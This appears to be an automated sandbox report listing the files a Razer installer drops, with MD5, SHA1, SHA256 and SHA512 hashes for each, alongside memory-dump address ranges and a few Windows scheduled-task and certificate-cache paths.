SHA512 9cdc9f0dd567dad666eff2aa4bc9e3ec7bf8d651d2524156721cef185c1f35a63ff0e2a8589a745cedbb9fd228d9427e59401a2cfb46ff3c8a4ba5b0fc6a24c4

memory/4036-333-0x000002144A4D0000-0x000002144A514000-memory.dmp

C:\Windows\Installer\Razer\Installer\App\NLog.dll

MD5 6b99cc30bb8a163094cabd9454e3fb61
SHA1 afbb727b1d827803bb326ab8c89e70602f85e1b0
SHA256 b911867ef2213e93d6ddaedf37ceeb8022a6aadf2bd0da31dbc75040f3802b15
SHA512 75a9419e447e1b7b71391ae53052b3c58582b52636b4aee70c8dc0a6e837d74245533f380dcc270db1c25b8af406a5fc9a20026c56bb3506654229ae95536621

C:\Windows\Installer\Razer\Installer\App\Razer.RazerInstallerCommon.dll

MD5 d8e33e71a1e868ea53c08e98f913d8c5
SHA1 82d30de3a27f7f58a4cd38cd91fa371a249e58dd
SHA256 2c02800fb4a42a5a9c1b65247ef088b902b1f5d22a0f643ac64951100a67e1b0
SHA512 ea3bcd6283e7b3407ba6c0b488a0aff62ec546a5e0339c908dfd0bba563773a5b0950040914b1fe719d42d796341ec381102b294f9c4df066ad98b921ce65e76

C:\Windows\Installer\Razer\Installer\App\Razer.DetectManagerWrapper.dll

MD5 75e24bdde1cd047d8fcb5487b1a3415b
SHA1 68da893871e7878ff3785d8fbac1b2d23eda2321
SHA256 9ee38e8507708d3338b96221f0f10982bbf1ec22fa66243ea3158fc0cf251f6b
SHA512 ef9d297233b422c7937feeb64e6d80df3baec1213cf20b5d4127297ae3ac2763e9318c97215cacb616e049f346466777f8569e3e16c13a9dace50b90f7d061dd

C:\Windows\Installer\Razer\Installer\App\rzS3detgmr_CWrapper.dll

MD5 a52218ecfa9a217836a89c57c338e6a2
SHA1 72aab32e94f5a85e39863b446c29b878a81273d5
SHA256 35fc7274acd8342c33213f4d1058f927a3d1a69ce40599decc0898fffa2f9fcc
SHA512 ef4182091db8942f2ecbcb9ee40e7d5046da840ad2083995309f7c918af723a701881378a2f1af1ce1893298d5584d2e7cd0960c1e3eab3cd6dba16b336da2e8

C:\Windows\Installer\Razer\Installer\App\ko-KR\Razer.RazerInstallerCommon.resources.dll

MD5 6c595dde4ce3d3c29f29b38e639af2b3
SHA1 2fd1deddb95c7bbb36f0c58c7d916ee217e252c0
SHA256 22e16f1e09248ca4162e766c143ca4f932fba4023962f0c45a14d29e3072f6b3
SHA512 67cb0baaad8bf55bdf090e079d042766f87aba1fd88c233b854d102a7fcc54add7e97ad3e3dc4fd1053e710bc31401542ef483dacecd0763706493d9186290c5

memory/4036-456-0x000002144A520000-0x000002144A596000-memory.dmp

C:\Windows\Installer\Razer\Installer\App\ja-JP\Razer.RazerInstallerCommon.resources.dll

MD5 22523785f3ec5e28535dac1ee9813a9c
SHA1 1f89143a11e06fef57cd485089d4d372d6e3a4e0
SHA256 0dd30251ae9df0720aa4db8ca026cb40615b9d692c39e9e48d5f235e797f417f
SHA512 7e6280c37c3393c2320f86fe71f12145419b5c44fdb6abfa52a53b329229e5547b00c099cfcb9726b2117f394118eabf259f48c6bc86a89c11093538d9855315

C:\Windows\Installer\Razer\Installer\App\zh-CHT\Razer.RazerInstallerCommon.resources.dll

MD5 9b84a3572abcf0f717f1e457a9f941b7
SHA1 3dc58308e6a0747882c310cf935e271d72c59999
SHA256 bc8a635eeee2c0d2a7a89294e1b86bc21fcc817bbdb6e0a3545166f08126422a
SHA512 d6dfd8bbc8bef097e86e6c00476be7c5076633364b28db2b97ce588153283a8f8aa3a3cc592a6e89209f63d6dd8443217d7c1c32dde32e0108ecf9dad4026b50

C:\Windows\Installer\Razer\Installer\App\zh-CHS\Razer.RazerInstallerCommon.resources.dll

MD5 8c0f3a4d39e605d4fc6a5c07bc1528c7
SHA1 2364595cc629e1c073a0ded4c4b840124973bdcb
SHA256 ce8e243207f1b784d3b2d369d5c87f4123b5eb2614552cfb53e60ebd6137d846
SHA512 7ce66409ccd5076d8fd2eeb3c0d94cc12ecab4d52e73a039a7e28495d2b2c2df7d9372b54838a8774ed1d6c42173262386973fab0c0b1ebede70a0c476564a45

C:\Windows\Installer\Razer\Installer\App\ru-RU\Razer.RazerInstallerCommon.resources.dll

MD5 0f3e357b568e7f6c4bbd737ca4e76a62
SHA1 3c79cec29446c953b138084185f62a64c6b90bca
SHA256 eeb0cbbcb53e6294012bf9412b7113c3e6b45069794475667bb2649b19374c41
SHA512 0ca364740216ca79d6346711a953f8a41c9daaf6eb3c3c0536d4d69b85b11706be69c5db587bd618a33ff19711ff2124749769c3e7d898d03f4bf0ad4a81107b

C:\Windows\Installer\Razer\Installer\App\pt-BR\Razer.RazerInstallerCommon.resources.dll

MD5 41ba2edc92e7f33f2b3ed76dbe65251e
SHA1 55c66452e9db6a94b6943b99c79a9a53b6394808
SHA256 6f233deebbfed108da76b75da47b37d6ac37dea83d2ecff6a0941b25cdcebd4d
SHA512 8b38bf316019cecd3b92a0f1974a250e1f1c51007a83d561ec5c26365c10d63e4a332cec7ca11abc5c6b08d8b6353d93618446d79cb0fc5637ad8c47fd6d5d90

C:\Windows\Installer\Razer\Installer\App\fr-FR\Razer.RazerInstallerCommon.resources.dll

MD5 b31c172dd1eef50ca4997097c1d90bf1
SHA1 76297138ce086598f9247d207379dca0bd0ba5b6
SHA256 7d11bb0abf4a6ae8d489add7d82cb90ac0298faf348e3a0bb9ff64183d909935
SHA512 2cfb6bae637ac99524074a705df9da69d8957bbf0cb63869eafa119070c78e14f6ed24c3b3df81ef41db7449c24d1650c46ac1efcc13c126a501d2611ed9c266

C:\Windows\Installer\Razer\Installer\App\es-ES\Razer.RazerInstallerCommon.resources.dll

MD5 252f5661b1baa3d6d5ab0a0f2deb569c
SHA1 ad5d390642bba6175aef3ebc1bfd867929a7bb2a
SHA256 6bdb9344af3b9beb8e7f515767697b70affedc52e7eed552524328ec7c59f325
SHA512 cf937a5b61a69231a35201dc05e1c814c77bff504c0f39f3df23caeac61c5e3c9f2d4362408b8a15874e367b0fc2f65dba5c040d40ddce7deb77e6ef6e0ecb1a

C:\Windows\Installer\Razer\Installer\App\de-DE\Razer.RazerInstallerCommon.resources.dll

MD5 781d8c513c3bbb09250ef2e6a40d5930
SHA1 f4702bae19a6df429c5aa7499fcd52bbdab4ea69
SHA256 486334a88e9d5b8c128cbd2acb43bf6741aca64dd6887786bbe667f599562f55
SHA512 54d55a769ffc1adffadcc0c42a3ef71d96a558fca6b5516f9cd16b90bd7dc1acd40e4c47c4ffb1299eb77da71f071ceaddbec3b9c11ba15c06424c905dc10135

C:\Windows\Installer\Razer\Installer\App\vcruntime140.dll

MD5 b7ebc19a5b23d0d32ff014e30be26061
SHA1 efb3b58b31a27407402a2be0d41aee120519c282
SHA256 5695560a50ed9746696c0d647e55d77459f5981907c177d086df36656a978b19
SHA512 922d94e80cdffeb51a1818c52b5c568597307225eed33c7c07e193322c2e9b0c7a5f17f3f4b57f2e22b8ad7f9509cb893bfc6d07d19af83360da6c0d807aa93a

C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe

MD5 a3398e51bb13475fb10e1e6f1e0bf3a4
SHA1 f2c5d26124159355921e4460699811f259ec3353
SHA256 4d89cbbb5b187b510ff972ae990b54f69a424fa6862bd10bb9e95c0f4c78fa4a
SHA512 4f3cba6654b45f62092a7306a1a86ae55d2991fece60f9886cdf57aad4a010323dbfb4a20569db3d30a5d5aade0ff20a5e37bd41ba1bdbbeefe7b30abe33a555

C:\Windows\Installer\Razer\Installer\App\vccorlib140.dll

MD5 af530e084fc969b552db842d3de5f285
SHA1 7d0bccad63d6b0f5f4b144ade34afb7fb342d22a
SHA256 92cd13772dd046e9e8a36343c96e6c145ce9072dc51de05aeae4a770cf4b1c33
SHA512 c89cb972067f7971c8ead078a89ebed0d4625a46370c11ddffbdd3f0e56619b55403d19cbf89ad001dbb9c302501bd3ea0331dbbb2a587b6ef79a5f709562792

C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe.config

MD5 1cbc9248f7468783548b2b23ee029d2a
SHA1 543da727378029ddeb225ce03271f4ec6486c5d9
SHA256 895d6569a9dec15595621a04a122d7cc0242e455e31a4f048ada9b85156baf24
SHA512 f81db797a8571900ba90759262723bfc071934da4d2e85364a56bd5401d1e5dd881983f79233e3cdd7b9c8dde29314b160880b402e17cd039007a8fbd23cfb6d

C:\Windows\Installer\Razer\Installer\App\ucrtbase.dll

MD5 015b30309491a911e75748ad69c9e680
SHA1 2f2243b6ea99689cd54e45b67d9b7d98847f904c
SHA256 dd32570b8183a8b117233333153da29cc8d2ac5b1c868440dd852d9c3f77baf5
SHA512 51159e407021ce78ad64ea91a5e53f59ee15d6d74b9c2891cd6dd532cae3f1d388198e0cd78648ce067e82fa7f01050b4773d95c5c827439f094b289f0ee0ac8

C:\Windows\Installer\Razer\Installer\App\systems.json

MD5 775c312110d971862864b91a2379794a
SHA1 b5a7a80ebd352fd45493f3968ebb2c7735fecb11
SHA256 2f2541706f13fd6d3eaad2628f7b4fa35f0648822edacb8b92d04cea42fc5537
SHA512 3c3428222feef08d3be3896ccfa72a1ae6ee0cb06e9c11f005439041e3f8ab9263a07f04a6c054e0d82edabd48aef9a68ecc45e3fad8803dde365e668f9b58ff

C:\Windows\Installer\Razer\Installer\App\rzS3detmgr.dll

MD5 6721b55ecbfdaeddeae0c09325349f1e
SHA1 835b9619ef9c3c211b80a4dc5857d350e9cda132
SHA256 c4f906944db89f70149103a3fdd749c79ae5d6b355be4b5ab60c967033bdd6ff
SHA512 ae0529cf915193d5be2a2b35cf723808b23b1ad4e0b71d3e2cda657f895250582bdc536ae400ec1bdcdd12498dc323db1dd4f893a31238e82e9e630c0d69252f

C:\Windows\Installer\Razer\Installer\App\PatchExceptionalEID.json

MD5 1a102291d5eb3146ffd0be2969ee0eae
SHA1 f35b9158d851d1ffe1a5dfde74cfecd2ec2bad94
SHA256 0f667d54883d3ba72a8a0cfa864431f79d74905e92976be0611706b1191c3c45
SHA512 56a987b077f88f0806b7daf1eda464fc393279a48859abed0b6ed942056e0d8f3bacdac7fbdcc40362fd1add47d6d81c7b9559083a567d37365c1b275c44e017

C:\Windows\Installer\Razer\Installer\App\cpprest140_2_10.dll

MD5 ba53f0cc539f5d03b5ddcbc68ba1d207
SHA1 a7d6d5e4e26a5dd7cd76a1baae0ac173b1c85d59
SHA256 aad1bbee36f08b0b87aa0b14b273f1e6aeaabb1a1500ecc9bff5500292ada648
SHA512 7fe242bb44ea3f4b6a03727e2e20981deb31901a9bf626bcf5925b688305ce5af99c730b3c1ba9eb73a6d9939c91ebb8948c502d622a401ed1ab26d82d9ffaae

memory/4416-491-0x0000000000A80000-0x0000000000ECC000-memory.dmp

memory/4036-492-0x0000021448060000-0x0000021448068000-memory.dmp

memory/4416-494-0x0000000005DA0000-0x0000000006344000-memory.dmp

memory/4036-493-0x000002144A100000-0x000002144A14C000-memory.dmp

memory/4416-495-0x00000000057F0000-0x000000000588C000-memory.dmp

memory/4416-496-0x0000000005890000-0x0000000005922000-memory.dmp

memory/4416-498-0x0000000005770000-0x000000000577A000-memory.dmp

memory/4036-497-0x0000021448070000-0x0000021448084000-memory.dmp

memory/3528-499-0x0000000003580000-0x00000000035AA000-memory.dmp

memory/4416-512-0x0000000005AB0000-0x0000000005B06000-memory.dmp

memory/3528-513-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/2748-515-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/2560-514-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/440-556-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/1452-565-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/2064-558-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/1328-555-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/3636-554-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/3392-567-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/1644-566-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/2644-564-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/1080-563-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/4328-562-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/4416-561-0x0000000006630000-0x0000000006910000-memory.dmp

memory/4920-552-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/4088-551-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/1736-550-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/952-549-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/1164-553-0x00007FFEE21B0000-0x00007FFEE21C0000-memory.dmp

memory/4416-596-0x00000000057D0000-0x00000000057DA000-memory.dmp

memory/4416-597-0x0000000005D50000-0x0000000005D7A000-memory.dmp

memory/4416-598-0x0000000005A20000-0x0000000005A42000-memory.dmp

memory/4416-600-0x0000000005A90000-0x0000000005A9A000-memory.dmp

memory/4416-617-0x000000000A990000-0x000000000A998000-memory.dmp

memory/4416-619-0x00000000071D0000-0x00000000071DE000-memory.dmp

memory/4416-618-0x00000000071F0000-0x0000000007228000-memory.dmp

memory/4416-620-0x0000000007240000-0x0000000007248000-memory.dmp

memory/4416-621-0x00000000072A0000-0x00000000072C2000-memory.dmp

memory/4416-622-0x0000000007280000-0x000000000729A000-memory.dmp

memory/4416-623-0x00000000072D0000-0x0000000007316000-memory.dmp

C:\ProgramData\Razer\Installer\Logs\RazerInstaller-cb19c464-e8c4-429d-93f5-55093fee4228.log

MD5 a6fea96892b5c1b3341740edf82ab452
SHA1 7c18f28e7e4b0fc66ecc162040aadd3e22092005
SHA256 7e0b41534545c6fe2ae9255e7bf01ec984c4eb768db7d38af3ca8b55353d7a44
SHA512 e69bc83da2036d8900a248b76782c8c36a91643e03e298424ee463f608535e4ed86d78b6fa5f6e0a075f98297f7781c4480a2d60250eafdea10c65db7a230b49

memory/4416-699-0x000000000AF90000-0x000000000B042000-memory.dmp

memory/4416-703-0x000000000C060000-0x000000000C22E000-memory.dmp

memory/4416-704-0x000000000BE90000-0x000000000BEB2000-memory.dmp

memory/4416-706-0x000000000C680000-0x000000000C6A0000-memory.dmp

memory/4416-705-0x000000000C5F0000-0x000000000C67A000-memory.dmp

memory/4416-707-0x000000000C820000-0x000000000C832000-memory.dmp

memory/4416-709-0x000000000C880000-0x000000000C8BC000-memory.dmp

memory/4416-713-0x000000000CAD0000-0x000000000CAED000-memory.dmp

memory/4416-719-0x000000000CDB0000-0x000000000CDB8000-memory.dmp

memory/4416-734-0x000000000D3A0000-0x000000000D406000-memory.dmp

memory/4416-737-0x000000000D280000-0x000000000D2AF000-memory.dmp

memory/4416-742-0x000000000D250000-0x000000000D260000-memory.dmp

memory/4416-743-0x000000000D270000-0x000000000D27A000-memory.dmp

memory/4416-738-0x000000006B5E0000-0x000000006B60F000-memory.dmp

C:\Windows\Installer\Razer\Installer\App\dongleV2.json

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\Installer\Razer\Installer\App\dongleV2.json

MD5 60d1685c219502b67f777e6322e39da6
SHA1 07fca7b5a4d379e7eb244e4578c132d2c285546b
SHA256 fe8be471fa6bbd88d62b4c9c1305dccad43feef8c7e6e303f7a06ea7a383c073
SHA512 07e3cd2a29e65ed4cbc575a5424bd92075f2e2fc2d6049d50631b4a66ac6472305dcba3ff3018501e5b5e5677dbf563ba16c8a072af3773ab2e074fc0e63decc

C:\Windows\Installer\Razer\Installer\App\dockEID.json

MD5 0ba7699b22971832fb281493db7c4545
SHA1 84e905aa566baa398cd42b62670e438986559f84
SHA256 9c27c8e8af9db9c93bdec5981e8348758b8de6d21f7da7fd196f88e440c89561
SHA512 7dbb7c75aec1fac2c83f9084368291508cffa5b6a8217c258c90b01b2908881b5f226ab4229f2c87a30529208fed2a344397f7843de010bb2553b38a477e7a3d

memory/4416-815-0x000000000E720000-0x000000000E8A6000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

MD5 91bbed6f5130692eadbb2470be491402
SHA1 7d02b595277a6287bc8e3e191636899e9613dfe5
SHA256 c30bc2267d949b6c9c4a9b0ea14d38620900dbf0a115f184d98a6a99ef232e89
SHA512 8cc6cb4aac3d748a9be3dc964d0d88d1b4d899dfe1b214dd728c2d928e3cde58af1b89578688cce5074906222b17fd1f2591d1f83e05754267074ee2f3020e46